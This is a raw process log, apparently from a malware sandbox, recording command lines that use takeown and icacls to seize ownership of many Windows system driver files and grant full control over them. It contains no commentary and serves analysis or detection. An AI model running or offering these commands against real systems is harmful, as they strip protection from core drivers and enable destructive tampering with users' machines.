"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\adp94xx.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpipmi.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\adpahci.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\adp94xx.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\adpu320.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\afd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\agilevpn.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\AGP440.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\aliide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdk8.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdide.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdide.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdppm.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\aliide.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdsata.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdsbs.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdxata.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\arc.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\appid.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\arcsas.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\asyncmac.sys
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-47320656-1961580554-551375662-1143936035609843098956902264-484539418-740232667"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\b57nd60a.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ataport.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\atapi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\battc.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\blbdrive.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\beep.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bowser.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BrFiltLo.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bridge.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BrFiltUp.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BrSerId.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BrSerId.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BrSerWdm.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20663756501549713040205383416-1949295970-1847517256656668718-10248136571617888576"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BrUsbSer.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bthmodem.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bxvbda.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cdrom.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cdfs.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\circlass.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Classpnp.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cng.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\CmBatt.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cmdide.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\CompositeBus.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\compbatt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\crcdisk.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\crashdmp.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\crcdisk.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\csc.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\discache.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dfsc.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\discache.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\disk.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dmvsc.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Diskdump.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\drmk.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Dumpata.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\drmkaud.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dumpfve.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dxapi.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dxg.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dxgkrnl.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dxapi.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dxg.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\elxstor.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dxgmms1.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\evbda.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\errdev.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\exfat.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fdc.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fastfat.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fileinfo.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\filetrace.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fsdepends.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fltMgr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\flpydisk.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fs_rec.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fvevol.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\gmreadme.txt
C:\Windows\System32\cmd.exe
